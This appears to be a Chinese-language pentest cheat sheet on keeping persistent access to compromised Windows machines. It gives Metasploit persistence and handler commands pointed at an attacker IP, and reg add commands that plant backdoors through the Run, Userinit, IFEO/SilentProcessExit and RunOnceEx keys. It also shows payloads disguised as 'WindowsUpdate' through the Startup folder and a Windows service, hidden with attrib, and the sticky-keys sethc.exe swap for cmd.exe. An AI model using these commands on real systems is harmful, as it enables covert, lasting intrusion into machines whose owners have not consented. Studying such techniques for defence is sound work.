内网渗透-权限维持
通过Web漏洞获取Webshell,以Webshell作为权限维持的方式,如果没有特别的隐藏手段,一是往往比较容易被查杀,二是也容易被管理员捕捉到;因此需要对webshell相应的权限进行长久地维持,以防被发现
MSF权限维持
MSF自带两种植入后门的方式,如果通过MSF进行渗透测试,这种方式还是相对简单粗暴的
persistence启动项后门
原理就是在C:\Users\用户名\AppData\Local\Temp下上传一个VBS脚本,通过该脚本,在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\下新建一个开机启动项
MSF连接后门
msf > use exploit/multi/handle
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 攻击者IP
msf > set LPORT 攻击者端口
msf > exploit -j
metsvc服务后门
原理就是在C:\Users\用户名\AppData\Local\Temp下上传三个文件(metsrvx86.dll、metsvc-server.exe、metsvc.exe),最后启动一个名为meterpreter的服务且为开机启动
MSF连接后门
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 攻击者IP
msf > set LPORT 31337(默认)
msf > exploit -j
CS权限维持
CS默认貌似并没有帮助安装后门的命令,因此如果通过CS安装后门与一般的cmd的方式安装后门基本一致
其它权限维持
注册表后门
开机自启注册表后门
原理就是在注册表的启动项下,新建一个键值对,键可变,值为后门程序的路径
第一步:上传后门程序
第二步:隐藏文件
第三步:通过注册表加入启动项
/v后面为键的名称,/t为键的类型,/d为该键具体的值,/f意为强制覆盖现有项
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f
PS:删除后门
删除注册表下对应的键值
删除后门程序
userinit注册表后门[推荐]
原理就是用户在登录时,winlogon会自动运行其中指定的程序
第一种方式:直接写入注册表
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,powershell代码" /f
第二种方式:使用powershell
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell代码"
Logon Scripts后门
第一步:上传后门程序
将powershell的一句话执行程序直接放入bat脚本中
第二步:隐藏后门程序
第三步:写入注册表
PS:清除后门:
映像劫持
需要部署后门程序,但是不易被发现
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v MonitorProcess /d "C:\Users\Administrator\Desktop\payload.exe"
原理来自:https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
RunOnceEx后门
需要重启和管理员权限
生成恶意DLL文件,并部署
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Windows\Temp\evil.dll"
原理:https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
自启目录后门
开机自启后门
第一步:上传后门程序
第二步:部署后门程序
copy "C:\Windows\Temp\payload.exe" "C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y
删除多余后门副本
第三步:隐藏后门程序
attrib "C:\Users\lamba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +h +s
服务启动后门
开机自启服务并启动后门
第一步:上传后门程序
第二步:创建Windows服务
sc create "WindowsUpdate" binpath= "cmd /c start C:\Windows\Temp\payload.exe"
sc config "WindowsUpdate" start= auto
第三步:启动服务
PS:停止服务,删除服务
计划任务后门
通过计划任务周期执行后门程序
第一步:上传后门程序
第二步:创建计划任务
第三步:隐藏后门程序
PS:删除计划任务
shift后门
在windows登录界面处,连续按5次shift来启动粘滞键,启动sethc程序
第一步:拷贝文件
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
第二步:隐藏文件